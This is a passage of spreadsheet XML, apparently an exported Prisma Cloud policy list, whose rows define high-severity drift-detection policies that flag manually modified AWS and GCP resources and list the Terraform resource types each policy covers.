works_permission","aws_opsworks_php_app_layer","aws_opsworks_rails_app_layer","aws_opsworks_rds_db_instance","aws_opsworks_stack","aws_opsworks_static_web_layer","aws_opsworks_user_profile","aws_organizations_account","aws_organizations_organization","aws_organizations_organizational_unit","aws_organizations_policy","aws_organizations_policy_attachment","aws_pinpoint_adm_channel","aws_pinpoint_apns_channel","aws_pinpoint_apns_sandbox_channel","aws_pinpoint_apns_voip_channel","aws_pinpoint_apns_voip_sandbox_channel","aws_pinpoint_app","aws_pinpoint_baidu_channel","aws_pinpoint_email_channel","aws_pinpoint_event_stream","aws_pinpoint_gcm_channel","aws_pinpoint_sms_channel","aws_placement_group","aws_proxy_protocol_policy","aws_qldb_ledger","aws_quicksight_group","aws_quicksight_user","aws_ram_principal_association","aws_ram_resource_association","aws_ram_resource_share","aws_ram_resource_share_accepter","aws_rds_cluster","aws_rds_cluster_endpoint","aws_rds_cluster_instance","aws_rds_cluster_parameter_group","aws_rds_global_cluster","aws_redshift_cluster","aws_redshift_event_subscription","aws_redshift_parameter_group","aws_redshift_security_group","aws_redshift_snapshot_copy_grant","aws_redshift_snapshot_schedule","aws_redshift_snapshot_schedule_association","aws_redshift_subnet_group","aws_resourcegroups_group","aws_route","aws_route53_delegation_set","aws_route53_health_check","aws_route53_query_log","aws_route53_record","aws_route53_resolver_endpoint","aws_route53_resolver_rule","aws_route53_resolver_rule_association","aws_route53_vpc_association_authorization","aws_route53_zone","aws_route53_zone_association","aws_route_table","aws_route_table_association","aws_s3_access_point","aws_s3_account_public_access_block","aws_s3_bucket","aws_s3_bucket_analytics_configuration","aws_s3_bucket_inventory","aws_s3_bucket_metric","aws_s3_bucket_notification","aws_s3_bucket_object","aws_s3_bucket_policy","aws_s3_bucket_public_access_block","aws_sagemaker_endpoint","aws_sagemaker_endpoint_configuration","aws_sagemaker_model","aws_sagemaker_notebook_instance","aws_sagemaker_notebook_instance_lifecycle_configuration","aws_secretsmanager_secret","aws_secretsmanager_secret_rotation","aws_secretsmanager_secret_version","aws_security_group","aws_security_group_rule","aws_securityhub_account","aws_securityhub_member","aws_securityhub_product_subscription","aws_securityhub_standards_subscription","aws_service_discovery_http_namespace","aws_service_discovery_private_dns_namespace","aws_service_discovery_public_dns_namespace","aws_service_discovery_service","aws_servicecatalog_portfolio","aws_servicequotas_service_quota","aws_ses_active_receipt_rule_set","aws_ses_configuration_set","aws_ses_domain_dkim","aws_ses_domain_identity","aws_ses_domain_identity_verification","aws_ses_domain_mail_from","aws_ses_email_identity","aws_ses_event_destination","aws_ses_identity_notification_topic","aws_ses_identity_policy","aws_ses_receipt_filter","aws_ses_receipt_rule","aws_ses_receipt_rule_set","aws_ses_template","aws_sfn_activity","aws_sfn_state_machine","aws_shield_protection","aws_simpledb_domain","aws_snapshot_create_volume_permission","aws_sns_platform_application","aws_sns_sms_preferences","aws_sns_topic","aws_sns_topic_policy","aws_sns_topic_subscription","aws_spot_datafeed_subscription","aws_spot_fleet_request","aws_spot_instance_request","aws_sqs_queue","aws_sqs_queue_policy","aws_ssm_activation","aws_ssm_association","aws_ssm_document","aws_ssm_maintenance_window","aws_ssm_maintenance_window_target","aws_ssm_maintenance_window_task","aws_ssm_parameter","aws_ssm_patch_baseline","aws_ssm_patch_group","aws_ssm_resource_data_sync","aws_storagegateway_cache","aws_storagegateway_cached_iscsi_volume","aws_storagegateway_gateway","aws_storagegateway_nfs_file_share","aws_storagegateway_smb_file_share","aws_storagegateway_upload_buffer","aws_storagegateway_working_storage","aws_subnet","aws_swf_domain","aws_transfer_server","aws_transfer_ssh_key","aws_transfer_user","aws_volume_attachment","aws_vpc","aws_vpc_dhcp_options","aws_vpc_dhcp_options_association","aws_vpc_endpoint","aws_vpc_endpoint_connection_notification","aws_vpc_endpoint_route_table_association","aws_vpc_endpoint_service","aws_vpc_endpoint_service_allowed_principal","aws_vpc_endpoint_subnet_association","aws_vpc_ipv4_cidr_block_association","aws_vpc_peering_connection","aws_vpc_peering_connection_accepter","aws_vpc_peering_connection_options","aws_vpn_connection","aws_vpn_connection_route","aws_vpn_gateway","aws_vpn_gateway_attachment","aws_vpn_gateway_route_propagation","aws_waf_byte_match_set","aws_waf_geo_match_set","aws_waf_ipset","aws_waf_rate_based_rule","aws_waf_regex_match_set","aws_waf_regex_pattern_set","aws_waf_rule","aws_waf_rule_group","aws_waf_size_constraint_set","aws_waf_sql_injection_match_set","aws_waf_web_acl","aws_waf_xss_match_set","aws_wafregional_byte_match_set","aws_wafregional_geo_match_set","aws_wafregional_ipset","aws_wafregional_rate_based_rule","aws_wafregional_regex_match_set","aws_wafregional_regex_pattern_set","aws_wafregional_rule","aws_wafregional_rule_group","aws_wafregional_size_constraint_set","aws_wafregional_sql_injection_match_set","aws_wafregional_web_acl","aws_wafregional_web_acl_association","aws_wafregional_xss_match_set","aws_wafv2_ip_set","aws_wafv2_regex_pattern_set","aws_wafv2_rule_group","aws_wafv2_web_acl","aws_wafv2_web_acl_association","aws_wafv2_web_acl_logging_configuration","aws_worklink_fleet","aws_worklink_website_certificate_authority_association","aws_workspaces_directory","aws_workspaces_ip_group","aws_workspaces_workspace","aws_xray_sampling_rule"]}</t>
        </is>
      </c>
      <c r="AA654" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB654" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC654" t="inlineStr">
        <is>
          <t>BC_AWS_DRIFT_2</t>
        </is>
      </c>
      <c r="AD654" t="b">
        <v>1</v>
      </c>
      <c r="AE654" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF654" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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CM Drift Test - Notifications:email, AccountGroups:PCS AWS Lab Org;,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 Drift Alert Rule - Notifications:, AccountGroups:tadenugba_AG1,tadenugba_ACCOUNT_GROUP_NAME,tadenugba AG;,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54" t="inlineStr">
        <is>
          <t>37fc0d7c-3e86-4e0d-b3ce-783d35c35430</t>
        </is>
      </c>
      <c r="AI654" t="inlineStr"/>
      <c r="AJ654" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK654" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" t="inlineStr"/>
      <c r="B655" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C655" s="2" t="inlineStr"/>
      <c r="D655" t="inlineStr"/>
      <c r="E655" t="inlineStr"/>
      <c r="F655" t="inlineStr"/>
      <c r="G655" t="b">
        <v>1</v>
      </c>
      <c r="H6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655" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J655" t="inlineStr">
        <is>
          <t>IaC:Drift:</t>
        </is>
      </c>
      <c r="K655" t="inlineStr">
        <is>
          <t>Traced GCP resources are manually modified</t>
        </is>
      </c>
      <c r="L655" t="inlineStr"/>
      <c r="M655" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N655" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O655" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P655" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q655" t="inlineStr"/>
      <c r="R655" t="inlineStr"/>
      <c r="S655" t="inlineStr"/>
      <c r="T655" t="b">
        <v>0</v>
      </c>
      <c r="U655" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V655" t="inlineStr">
        <is>
          <t>IaC:Drift:</t>
        </is>
      </c>
      <c r="W655" t="inlineStr">
        <is>
          <t>Ensure traced GCP resources are not manually modified</t>
        </is>
      </c>
      <c r="X655" t="inlineStr">
        <is>
          <t>Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/drift-detection
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/drift-detection</t>
        </is>
      </c>
      <c r="Y655" t="inlineStr"/>
      <c r="Z655" t="inlineStr">
        <is>
          <t>{"category":"Drift","resourceTypes":[]}
{"category":"Drift","resourceTypes":["google_access_context_manager_access_level","google_access_context_manager_access_policy","google_access_context_manager_service_perimeter","google_access_context_manager_service_perimeter_resource","google_active_directory_domain","google_app_engine_application","google_app_engine_application_url_dispatch_rules","google_app_engine_domain_mapping","google_app_engine_firewall_rule","google_app_engine_flexible_app_version","google_app_engine_service_split_traffic","google_app_engine_standard_app_version","google_bigquery_data_transfer_config","google_bigquery_dataset","google_bigquery_dataset_access","google_bigquery_dataset_iam","google_bigquery_job","google_bigquery_table","google_bigtable_app_profile","google_bigtable_gc_policy","google_bigtable_instance","google_bigtable_instance_iam","google_bigtable_table","google_billing_account_iam_binding","google_billing_account_iam_member","google_billing_account_iam_policy","google_binary_authorization_attestor","google_binary_authorization_attestor_iam","google_binary_authorization_policy","google_cloud_asset_folder_feed","google_cloud_asset_organization_feed","google_cloud_asset_project_feed","google_cloud_run_domain_mapping","google_cloud_run_service","google_cloud_run_service_iam","google_cloud_scheduler_job","google_cloud_tasks_queue","google_cloudbuild_trigger","google_cloudfunctions_cloud_function_iam","google_cloudfunctions_function","google_cloudiot_device","google_cloudiot_device_registry","google_composer_environment","google_compute_address","google_compute_attached_disk","google_compute_autoscaler","google_compute_backend_bucket","google_compute_backend_bucket_signed_url_key","google_compute_backend_service","google_compute_backend_service_signed_url_key","google_compute_disk","google_compute_disk_resource_policy_attachment","google_compute_firewall","google_compute_forwarding_rule","google_compute_global_address","google_compute_global_forwarding_rule","google_compute_global_network_endpoint","google_compute_global_network_endpoint_group","google_compute_health_check","google_compute_http_health_check","google_compute_https_health_check","google_compute_image","google_compute_instance","google_compute_instance_from_template","google_compute_instance_group","google_compute_instance_group_manager","google_compute_instance_group_named_port","google_compute_instance_iam","google_compute_instance_template","google_compute_interconnect_attachment","google_compute_network","google_compute_network_endpoint","google_compute_network_endpoint_group","google_compute_network_peering","google_compute_network_peering_routes_config","google_compute_node_group","google_compute_node_template","google_compute_project_default_network_tier","google_compute_project_metadata","google_compute_project_metadata_item","google_compute_region_autoscaler","google_compute_region_backend_service","google_compute_region_disk","google_compute_region_health_check","google_compute_region_instance_group_manager","google_compute_region_ssl_certificate","google_compute_region_target_http_proxy","google_compute_region_target_https_proxy","google_compute_region_url_map","google_compute_reservation","google_compute_resource_policy","google_compute_route","google_compute_router","google_compute_router_bgp_peer","google_compute_router_interface","google_compute_router_nat","google_compute_security_policy","google_compute_shared_vpc_host_project","google_compute_shared_vpc_service_project","google_compute_snapshot","google_compute_ssl_certificate","google_compute_ssl_policy","google_compute_subnetwork","google_compute_subnetwork_iam","google_compute_target_http_proxy","google_compute_target_https_proxy","google_compute_target_instance","google_compute_target_pool","google_compute_target_ssl_proxy","google_compute_url_map","google_compute_vpn_gateway","google_compute_vpn_tunnel","google_container_analysis_note","google_container_analysis_occurrence","google_container_cluster","google_container_node_pool","google_container_registry","google_data_catalog_entry","google_data_catalog_entry_group","google_data_catalog_entry_group_iam","google_data_catalog_tag","google_data_catalog_tag_template","google_dataflow_flex_template_job","google_dataflow_job","google_dataproc_autoscaling_policy","google_dataproc_cluster","google_dataproc_cluster_iam","google_dataproc_job","google_dataproc_job_iam","google_datastore_index","google_deployment_manager_deployment","google_dialogflow_agent","google_dialogflow_entity_type","google_dialogflow_intent","google_dns_managed_zone","google_dns_policy","google_dns_record_set","google_endpoints_service","google_endpoints_service_iam","google_filestore_instance","google_firestore_index","google_folder","google_folder_iam_audit_config","google_folder_iam_binding","google_folder_iam_member","google_folder_iam_policy","google_folder_organization_policy","google_healthcare_dataset","google_healthcare_dataset_iam","google_healthcare_dicom_store","google_healthcare_dicom_store_iam","google_healthcare_fhir_store","google_healthcare_fhir_store_iam","google_healthcare_hl7_v2_store","google_iap_app_engine_service_iam","google_iap_app_engine_version_iam","google_iap_brand","google_iap_client","google_iap_tunnel_instance_iam","google_iap_web_backend_service_iam","google_iap_web_iam","google_iap_web_type_app_engine_iam","google_iap_web_type_compute_iam","google_identity_platform_default_supported_idp_config","google_identity_platform_inbound_saml_config","google_identity_platform_oauth_idp_config","google_identity_platform_tenant","google_identity_platform_tenant_inbound_saml_config","google_identity_platform_tenant_oauth_idp_config","google_kms_crypto_key","google_kms_crypto_key_iam","google_kms_key_ring","google_kms_key_ring_iam","google_kms_secret_ciphertext","google_logging_billing_account_bucket_config","google_logging_billing_account_exclusion","google_logging_billing_account_sink","google_logging_folder_bucket_config","google_logging_folder_exclusion","google_logging_folder_sink","google_logging_metric","google_logging_organization_bucket_config","google_logging_organization_exclusion","google_logging_organization_sink","google_logging_project_bucket_config","google_logging_project_exclusion","google_logging_project_sink","google_ml_engine_model","google_monitoring_alert_policy","google_monitoring_dashboard","google_monitoring_group","google_monitoring_metric_descriptor","google_monitoring_notification_channel","google_monitoring_service","google_monitoring_slo","google_monitoring_uptime_check_config","google_network_management_connectivity_test_resource","google_organization_iam_audit_config","google_organization_iam_binding","google_organization_iam_custom_role","google_organization_iam_member","google_organization_iam_policy","google_organization_policy","google_os_config_patch_deployment","google_os_login_ssh_public_key","google_project","google_project_iam","google_project_iam_custom_role","google_project_organization_policy","google_project_service","google_pubsub_subscription","google_pubsub_subscription_iam","google_pubsub_topic","google_pubsub_topic_iam","google_redis_instance","google_resource_manager_lien","google_runtimeconfig_config","google_runtimeconfig_config_iam","google_scc_source","google_secret_manager_secret","google_secret_manager_secret_iam","google_secret_manager_secret_version","google_service_account","google_service_account_iam","google_service_account_key","google_service_networking_connection","google_sourcerepo_repository","google_sourcerepo_repository_iam","google_spanner_database","google_spanner_database_iam","google_spanner_instance","google_spanner_instance_iam","google_sql_database","google_sql_database_instance","google_sql_source_representation_instance","google_sql_ssl_cert","google_sql_user","google_storage_bucket","google_storage_bucket_access_control","google_storage_bucket_acl","google_storage_bucket_iam","google_storage_bucket_object","google_storage_default_object_access_control","google_storage_default_object_acl","google_storage_hmac_key","google_storage_notification","google_storage_object_access_control","google_storage_object_acl","google_storage_transfer_job","google_tpu_node","google_usage_export_bucket","google_vpc_access_connector"]}</t>
        </is>
      </c>
      <c r="AA655" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB655" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC655" t="inlineStr">
        <is>
          <t>BC_GCP_DRIFT_2</t>
        </is>
      </c>
      <c r="AD655" t="b">
        <v>1</v>
      </c>
      <c r="AE655" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF655" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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655" t="inlineStr">
        <is>
          <t>369af0c4-76f7-4bc6-bffe-19d367b24ba2</t>
        </is>
      </c>
      <c r="AI655" t="inlineStr"/>
      <c r="AJ655" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK655" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" t="inlineStr"/>
      <c r="B656" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C656" s="2" t="inlineStr"/>
      <c r="D656" t="inlineStr"/>
      <c r="E656" t="inlineStr"/>
      <c r="F656" t="inlineStr"/>
      <c r="G656" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J656" t="inlineStr">
        <is>
          <t>IaC:Drift:aws-accessanalyzer-analyzer,aws-acm-certificate,aws-acm-certificate-validation,aws-acmpca-certificate-authority,aws-ami,aws-ami-copy,aws-ami-from-instance,aws-ami-launch-permission,aws-api-gateway</t>
        </is>
      </c>
      <c r="K656" t="inlineStr">
        <is>
          <t>AWS provisioned resources are manually modified</t>
        </is>
      </c>
      <c r="L656" t="inlineStr"/>
      <c r="M656" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N656" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O656" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P656" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q656" t="inlineStr"/>
      <c r="R656" t="inlineStr"/>
      <c r="S656" t="inlineStr"/>
      <c r="T656" t="b">
        <v>0</v>
      </c>
      <c r="U656" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V656" t="inlineStr">
        <is>
          <t>IaC:Drift:aws-accessanalyzer-analyzer,aws-acm-certificate,aws-acm-certificate-validation,aws-acmpca-certificate-authority,aws-ami,aws-ami-copy,aws-ami-from-instance,aws-ami-launch-permission,aws-api-gateway-account,aws-api-gateway-api-key,aws-api-gateway-authorizer,aws-api-gateway-base-path-mapping,aws-api-gateway-client-certificate,aws-api-gateway-deployment,aws-api-gateway-documentation-part,aws-api-gateway-documentation-version,aws-api-gateway-domain-name,aws-api-gateway-gateway-response,aws-api-gateway-integration,aws-api-gateway-integration-response,aws-api-gateway-method,aws-api-gateway-method-response,aws-api-gateway-method-settings,aws-api-gateway-model,aws-api-gateway-request-validator,aws-api-gateway-resource,aws-api-gateway-rest-api,aws-api-gateway-stage,aws-api-gateway-usage-plan,aws-api-gateway-usage-plan-key,aws-api-gateway-vpc-link,aws-apigatewayv2-api,aws-apigatewayv2-api-mapping,aws-apigatewayv2-authorizer,aws-apigatewayv2-deployment,aws-apigatewayv2-domain-name,aws-apigatewayv2-integration,aws-apigatewayv2-integration-response,aws-apigatewayv2-model,aws-apigatewayv2-route,aws-apigatewayv2-route-response,aws-apigatewayv2-stage,aws-apigatewayv2-vpc-link,aws-app-cookie-stickiness-policy,aws-appautoscaling-policy,aws-appautoscaling-scheduled-action,aws-appautoscaling-target,aws-appmesh-mesh,aws-appmesh-route,aws-appmesh-virtual-node,aws-appmesh-virtual-router,aws-appmesh-virtual-service,aws-appsync-api-key,aws-appsync-datasource,aws-appsync-function,aws-appsync-graphql-api,aws-appsync-resolver,aws-athena-database,aws-athena-named-query,aws-athena-workgroup,aws-autoscaling-attachment,aws-autoscaling-group,aws-autoscaling-lifecycle-hook,aws-autoscaling-notification,aws-autoscaling-policy,aws-autoscaling-schedule,aws-backup-plan,aws-backup-selection,aws-backup-vault,aws-batch-compute-environment,aws-batch-job-definition,aws-batch-job-queue,aws-budgets-budget,aws-cloud9-environment-ec2,aws-cloudformation-stack,aws-cloudformation-stack-set,aws-cloudformation-stack-set-instance,aws-cloudfront-distribution,aws-cloudfront-origin-access-identity,aws-cloudfront-public-key,aws-cloudhsm-v2-cluster,aws-cloudhsm-v2-hsm,aws-cloudtrail,aws-cloudwatch-dashboard,aws-cloudwatch-event-permission,aws-cloudwatch-event-rule,aws-cloudwatch-event-target,aws-cloudwatch-log-destination,aws-cloudwatch-log-destination-policy,aws-cloudwatch-log-group,aws-cloudwatch-log-metric-filter,aws-cloudwatch-log-resource-policy,aws-cloudwatch-log-stream,aws-cloudwatch-log-subscription-filter,aws-cloudwatch-metric-alarm,aws-codebuild-project,aws-codebuild-source-credential,aws-codebuild-webhook,aws-codecommit-repository,aws-codecommit-trigger,aws-codedeploy-app,aws-codedeploy-deployment-config,aws-codedeploy-deployment-group,aws-codepipeline,aws-codepipeline-webhook,aws-codestarnotifications-notification-rule,aws-cognito-identity-pool,aws-cognito-identity-pool-roles-attachment,aws-cognito-identity-provider,aws-cognito-resource-server,aws-cognito-user-group,aws-cognito-user-pool,aws-cognito-user-pool-client,aws-cognito-user-pool-domain,aws-config-aggregate-authorization,aws-config-config-rule,aws-config-configuration-aggregator,aws-config-configuration-recorder,aws-config-configuration-recorder-status,aws-config-delivery-channel,aws-config-organization-custom-rule,aws-config-organization-managed-rule,aws-cur-report-definition,aws-customer-gateway,aws-datapipeline-pipeline,aws-datasync-agent,aws-datasync-location-efs,aws-datasync-location-nfs,aws-datasync-location-s3,aws-datasync-location-smb,aws-datasync-task,aws-dax-cluster,aws-dax-parameter-group,aws-dax-subnet-group,aws-db-cluster-snapshot,aws-db-event-subscription,aws-db-instance,aws-db-instance-role-association,aws-db-option-group,aws-db-parameter-group,aws-db-security-group,aws-db-snapshot,aws-db-subnet-group,aws-default-network-acl,aws-default-route-table,aws-default-security-group,aws-default-subnet,aws-default-vpc,aws-default-vpc-dhcp-options,aws-devicefarm-project,aws-directory-service-conditional-forwarder,aws-directory-service-directory,aws-directory-service-log-subscription,aws-dlm-lifecycle-policy,aws-dms-certificate,aws-dms-endpoint,aws-dms-event-subscription,aws-dms-replication-instance,aws-dms-replication-subnet-group,aws-dms-replication-task,aws-docdb-cluster,aws-docdb-cluster-instance,aws-docdb-cluster-parameter-group,aws-docdb-cluster-snapshot,aws-docdb-subnet-group,aws-dx-bgp-peer,aws-dx-connection,aws-dx-connection-association,aws-dx-gateway,aws-dx-gateway-association,aws-dx-gateway-association-proposal,aws-dx-hosted-private-virtual-interface,aws-dx-hosted-private-virtual-interface-accepter,aws-dx-hosted-public-virtual-interface,aws-dx-hosted-public-virtual-interface-accepter,aws-dx-hosted-transit-virtual-interface,aws-dx-hosted-transit-virtual-interface-accepter,aws-dx-lag,aws-dx-private-virtual-interface,aws-dx-public-virtual-interface,aws-dx-transit-virtual-interface,aws-dynamodb-global-table,aws-dynamodb-table,aws-dynamodb-table-item,aws-ebs-default-kms-key,aws-ebs-encryption-by-default,aws-ebs-snapshot,aws-ebs-snapshot-copy,aws-ebs-volume,aws-ec2-availability-zone-group,aws-ec2-capacity-reservation,aws-ec2-client-vpn-authorization-rule,aws-ec2-client-vpn-endpoint,aws-ec2-client-vpn-network-association,aws-ec2-client-vpn-route,aws-ec2-fleet,aws-ec2-local-gateway-route,aws-ec2-local-gateway-route-table-vpc-association,aws-ec2-tag,aws-ec2-traffic-mirror-filter,aws-ec2-traffic-mirror-filter-rule,aws-ec2-traffic-mirror-session,aws-ec2-traffic-mirror-target,aws-ec2-transit-gateway,aws-ec2-transit-gateway-peering-attachment,aws-ec2-transit-gateway-peering-attachment-accepter,aws-ec2-transit-gateway-route,aws-ec2-transit-gateway-route-table,aws-ec2-transit-gateway-route-table-association,aws-ec2-transit-gateway-route-table-propagation,aws-ec2-transit-gateway-vpc-attachment,aws-ec2-transit-gateway-vpc-attachment-accepter,aws-ecr-lifecycle-policy,aws-ecr-repository,aws-ecr-repository-policy,aws-ecs-capacity-provider,aws-ecs-cluster,aws-ecs-service,aws-ecs-task-definition,aws-efs-access-point,aws-efs-file-system,aws-efs-file-system-policy,aws-efs-mount-target,aws-egress-only-internet-gateway,aws-eip,aws-eip-association,aws-eks-cluster,aws-eks-fargate-profile,aws-eks-node-group,aws-elastic-beanstalk-application,aws-elastic-beanstalk-application-version,aws-elastic-beanstalk-configuration-template,aws-elastic-beanstalk-environment,aws-elasticache-cluster,aws-elasticache-parameter-group,aws-elasticache-replication-group,aws-elasticache-security-group,aws-elasticache-subnet-group,aws-elasticsearch-domain,aws-elasticsearch-domain-policy,aws-elastictranscoder-pipeline,aws-elastictranscoder-preset,aws-elb,aws-elb-attachment,aws-emr-cluster,aws-emr-instance-group,aws-emr-security-configuration,aws-flow-log,aws-fms-admin-account,aws-fsx-lustre-file-system,aws-fsx-windows-file-system,aws-gamelift-alias,aws-gamelift-build,aws-gamelift-fleet,aws-gamelift-game-session-queue,aws-glacier-vault,aws-glacier-vault-lock,aws-globalaccelerator-accelerator,aws-globalaccelerator-endpoint-group,aws-globalaccelerator-listener,aws-glue-catalog-database,aws-glue-catalog-table,aws-glue-classifier,aws-glue-connection,aws-glue-crawler,aws-glue-job,aws-glue-security-configuration,aws-glue-trigger,aws-glue-workflow,aws-guardduty-detector,aws-guardduty-invite-accepter,aws-guardduty-ipset,aws-guardduty-member,aws-guardduty-organization-admin-account,aws-guardduty-organization-configuration,aws-guardduty-threatintelset,aws-iam-access-key,aws-iam-account-alias,aws-iam-account-password-policy,aws-iam-group,aws-iam-group-membership,aws-iam-group-policy,aws-iam-group-policy-attachment,aws-iam-instance-profile,aws-iam-openid-connect-provider,aws-iam-policy,aws-iam-policy-attachment,aws-iam-role,aws-iam-role-policy,aws-iam-role-policy-attachment,aws-iam-saml-provider,aws-iam-server-certificate,aws-iam-service-linked-role,aws-iam-user,aws-iam-user-group-membership,aws-iam-user-login-profile,aws-iam-user-policy,aws-iam-user-policy-attachment,aws-iam-user-ssh-key,aws-inspector-assessment-target,aws-inspector-assessment-template,aws-inspector-resource-group,aws-instance,aws-internet-gateway,aws-iot-certificate,aws-iot-policy,aws-iot-policy-attachment,aws-iot-role-alias,aws-iot-thing,aws-iot-thing-principal-attachment,aws-iot-thing-type,aws-iot-topic-rule,aws-key-pair,aws-kinesis-analytics-application,aws-kinesis-firehose-delivery-stream,aws-kinesis-stream,aws-kinesis-video-stream,aws-kms-alias,aws-kms-ciphertext,aws-kms-external-key,aws-kms-grant,aws-kms-key,aws-lambda-alias,aws-lambda-event-source-mapping,aws-lambda-function,aws-lambda-function-event-invoke-config,aws-lambda-layer-version,aws-lambda-permission,aws-lambda-provisioned-concurrency-config,aws-launch-configuration,aws-launch-template,aws-lb,aws-lb-cookie-stickiness-policy,aws-lb-listener,aws-lb-listener-certificate,aws-lb-listener-rule,aws-lb-ssl-negotiation-policy,aws-lb-target-group,aws-lb-target-group-attachment,aws-licensemanager-association,aws-licensemanager-license-configuration,aws-lightsail-domain,aws-lightsail-instance,aws-lightsail-key-pair,aws-lightsail-static-ip,aws-lightsail-static-ip-attachment,aws-load-balancer-backend-server-policy,aws-load-balancer-listener-policy,aws-load-balancer-policy,aws-macie-member-account-association,aws-macie-s3-bucket-association,aws-main-route-table-association,aws-media-convert-queue,aws-media-package-channel,aws-media-store-container,aws-media-store-container-policy,aws-mq-broker,aws-mq-configuration,aws-msk-cluster,aws-msk-configuration,aws-nat-gateway,aws-neptune-cluster,aws-neptune-cluster-instance,aws-neptune-cluster-parameter-group,aws-neptune-cluster-snapshot,aws-neptune-event-subscription,aws-neptune-parameter-group,aws-neptune-subnet-group,aws-network-acl,aws-network-acl-rule,aws-network-interface,aws-network-interface-attachment,aws-network-interface-sg-attachment,aws-opsworks-application,aws-opsworks-custom-layer,aws-opsworks-ganglia-layer,aws-opsworks-haproxy-layer,aws-opsworks-instance,aws-opsworks-java-app-layer,aws-opsworks-memcached-layer,aws-opsworks-mysql-layer,aws-opsworks-nodejs-app-layer,aws-opsworks-permission,aws-opsworks-php-app-layer,aws-opsworks-rails-app-layer,aws-opsworks-rds-db-instance,aws-opsworks-stack,aws-opsworks-static-web-layer,aws-opsworks-user-profile,aws-organizations-account,aws-organizations-organization,aws-organizations-organizational-unit,aws-organizations-policy,aws-organizations-policy-attachment,aws-pinpoint-adm-channel,aws-pinpoint-apns-channel,aws-pinpoint-apns-sandbox-channel,aws-pinpoint-apns-voip-channel,aws-pinpoint-apns-voip-sandbox-channel,aws-pinpoint-app,aws-pinpoint-baidu-channel,aws-pinpoint-email-channel,aws-pinpoint-event-stream,aws-pinpoint-gcm-channel,aws-pinpoint-sms-channel,aws-placement-group,aws-proxy-protocol-policy,aws-qldb-ledger,aws-quicksight-group,aws-quicksight-user,aws-ram-principal-association,aws-ram-resource-association,aws-ram-resource-share,aws-ram-resource-share-accepter,aws-rds-cluster,aws-rds-cluster-endpoint,aws-rds-cluster-instance,aws-rds-cluster-parameter-group,aws-rds-global-cluster,aws-redshift-cluster,aws-redshift-event-subscription,aws-redshift-parameter-group,aws-redshift-security-group,aws-redshift-snapshot-copy-grant,aws-redshift-snapshot-schedule,aws-redshift-snapshot-schedule-association,aws-redshift-subnet-group,aws-resourcegroups-group,aws-route,aws-route53-delegation-set,aws-route53-health-check,aws-route53-query-log,aws-route53-record,aws-route53-resolver-endpoint,aws-route53-resolver-rule,aws-route53-resolver-rule-association,aws-route53-vpc-association-authorization,aws-route53-zone,aws-route53-zone-association,aws-route-table,aws-route-table-association,aws-s3-access-point,aws-s3-account-public-access-block,aws-s3-bucket,aws-s3-bucket-analytics-configuration,aws-s3-bucket-inventory,aws-s3-bucket-metric,aws-s3-bucket-notification,aws-s3-bucket-object,aws-s3-bucket-policy,aws-s3-bucket-public-access-block,aws-sagemaker-endpoint,aws-sagemaker-endpoint-configuration,aws-sagemaker-model,aws-sagemaker-notebook-instance,aws-sagemaker-notebook-instance-lifecycle-configuration,aws-secretsmanager-secret,aws-secretsmanager-secret-rotation,aws-secretsmanager-secret-version,aws-security-group,aws-security-group-rule,aws-securityhub-account,aws-securityhub-member,aws-securityhub-product-subscription,aws-securityhub-standards-subscription,aws-service-discovery-http-namespace,aws-service-discovery-private-dns-namespace,aws-service-discovery-public-dns-namespace,aws-service-discovery-service,aws-servicecatalog-portfolio,aws-servicequotas-service-quota,aws-ses-active-receipt-rule-set,aws-ses-configuration-set,aws-ses-domain-dkim,aws-ses-domain-identity,aws-ses-domain-identity-verification,aws-ses-domain-mail-from,aws-ses-email-identity,aws-ses-event-destination,aws-ses-identity-notification-topic,aws-ses-identity-policy,aws-ses-receipt-filter,aws-ses-receipt-rule,aws-ses-receipt-rule-set,aws-ses-template,aws-sfn-activity,aws-sfn-state-machine,aws-shield-protection,aws-simpledb-domain,aws-snapshot-create-volume-permission,aws-sns-platform-application,aws-sns-sms-preferences,aws-sns-topic,aws-sns-topic-policy,aws-sns-topic-subscription,aws-spot-datafeed-subscription,aws-spot-fleet-request,aws-spot-instance-request,a